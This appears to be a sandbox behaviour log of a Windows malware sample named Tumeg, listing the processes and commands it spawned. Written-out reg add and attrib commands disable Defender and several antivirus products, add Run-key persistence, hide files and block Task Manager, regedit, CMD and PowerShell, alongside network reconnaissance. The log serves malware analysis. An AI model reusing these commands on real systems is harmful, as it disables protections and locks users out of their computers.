C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:13⤵PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7448 /prefetch:13⤵PID:468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9680 /prefetch:13⤵PID:4156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10144 /prefetch:13⤵PID:3864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1916 /prefetch:13⤵PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3412 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10076 /prefetch:13⤵PID:6648
-
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 1 -w 10002⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3804
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:4828
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:1636
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:1400
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:8
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:3764
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:2296
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:1168
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:3948
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:2008
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:872
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:3172
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:3872
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:2964
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:2360
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:3292
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:1736
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:1508
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:1864
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:3172
-
-
C:\Windows\system32\cscript.execscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"2⤵PID:1524
-
-
C:\Windows\system32\sc.exesc config winpeshl start=disabled2⤵
- Launches sc.exe
PID:2456
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v DisallowWinPELicensing /t REG_DWORD /d 1 /f2⤵PID:5264
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx" /v "TITLE" /t REG_SZ /d "Tumeg doesn't want to upload your files LOL!" /f2⤵
- Adds Run key to start application
PID:5692
-
-
C:\Windows\system32\attrib.exeattrib +r "C:\ProgramData\Tumeg.exe"2⤵
- Views/modifies file attributes
PID:5736
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\ProgramData\Tumeg.exe"2⤵
- Views/modifies file attributes
PID:5780
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\links.vbs"2⤵PID:5840
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=hydra+dragon+antivirus+(rogue+real)3⤵PID:4196
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:2672
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=free+robux3⤵PID:5528
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x130,0x134,0x138,0x108,0x13c,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:3456
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=how+to+download+windows+123⤵PID:5312
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:4360
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=how+to+make+virus+with+batch3⤵PID:648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:2700
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=roblox+fps+unlocker3⤵PID:6988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:7004
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=bandicam+serial+key+free+download3⤵PID:6652
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:1340
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=Is+protogent+safe?3⤵PID:6240
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:5604
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=wannacry+dowloand3⤵PID:6580
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:64
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=download+rogue+antivirus3⤵PID:5264
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:5020
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=no+escape+exe+antivirus3⤵PID:2324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:3772
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=pdf+converter3⤵PID:436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x128,0x138,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:2744
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=gta+6+leaks3⤵PID:4352
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:4236
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=download+rogue+antivirus3⤵PID:6980
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:5960
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=gta+6+download+full+version3⤵PID:6964
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47184⤵PID:824
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr /C:"IPv4 Address"2⤵PID:5940
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
PID:5956
-
-
C:\Windows\system32\findstr.exefindstr /C:"IPv4 Address"3⤵PID:5964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic useraccount where "Name='Admin'" get Caption2⤵PID:6020
-
C:\Windows\System32\Wbem\WMIC.exewmic useraccount where "Name='Admin'" get Caption3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com | find "Address"2⤵PID:8
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵PID:5228
-
-
C:\Windows\system32\find.exefind "Address"3⤵PID:5256
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup2.bat" /f2⤵
- Adds Run key to start application
PID:6080
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup3.bat" /f2⤵
- Adds Run key to start application
PID:3792
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup4.bat" /f2⤵
- Adds Run key to start application
PID:5864
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup5.bat" /f2⤵
- Adds Run key to start application
PID:5544
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v "AntiVirusOverride" /t REG_DWORD /d "1" /f2⤵
- Windows security bypass
PID:3292
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:5824
-
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\.cat" /v "Content Type" /t REG_SZ /d "dllhost.exe" /f2⤵PID:5788
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\AVAST Software\Avast" /v "aswidsagenta" /t REG_DWORD /d "0" /f2⤵
- Checks for any installed AV software in registry
PID:4208
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\AVG" /v "DisableAv" /t REG_DWORD /d "1" /f2⤵PID:2584
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /v "BlockUserModeAccess" /t REG_DWORD /d "1" /f2⤵PID:4204
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee" /v "bDisableSelfProtection" /t REG_DWORD /d "1" /f2⤵PID:632
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security" /v "ProtectEnabled" /t REG_DWORD /d "0" /f2⤵PID:5796
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab" /v "Enable" /t REG_DWORD /d "0" /f2⤵PID:5100
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /v "MalwareProtectionEnabled" /t REG_DWORD /d "0" /f2⤵PID:1232
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Norton" /v "Enable" /t REG_DWORD /d "0" /f2⤵PID:5480
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Avira" /v "ProductEnabled" /t REG_DWORD /d "0" /f2⤵
- Checks for any installed AV software in registry
PID:5472
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangeTime /t REG_DWORD /d 1 /f2⤵PID:5488
-
-
C:\Windows\system32\attrib.exeattrib -r -s -h "C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf"2⤵
- Drops autorun.inf file
- Drops file in Windows directory
- Views/modifies file attributes
PID:332
-
-
C:\Windows\system32\attrib.exeattrib +r +s +h "C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf"2⤵
- Sets file to hidden
- Drops autorun.inf file
- Drops file in Windows directory
- Views/modifies file attributes
PID:6052
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:4224
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v DisablePowerShell /t REG_DWORD /d 1 /f2⤵PID:5572
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\MMC" /v RestrictToPermittedSnapins /t REG_DWORD /d 1 /f2⤵PID:5600
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:5628
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisablePaint /t REG_DWORD /d 1 /f2⤵PID:5632
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
PID:5656
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableStickyKeys /t REG_DWORD /d 1 /f2⤵PID:5668
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:5500
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisablePerformanceMonitor /t REG_DWORD /d 1 /f2⤵PID:436
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:520
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMMC /t REG_DWORD /d 1 /f2⤵PID:4360
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableEventViewer /t REG_DWORD /d 1 /f2⤵PID:6024
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵PID:1460
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableCMD /t REG_DWORD /d 1 /f2⤵PID:5984
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableSnippingTool /t REG_DWORD /d 1 /f2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3700
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵PID:5292
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMagnifier /t REG_DWORD /d 1 /f2⤵PID:5940
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableEaseOfAccess /t REG_DWORD /d 1 /f2⤵PID:4060
-
-
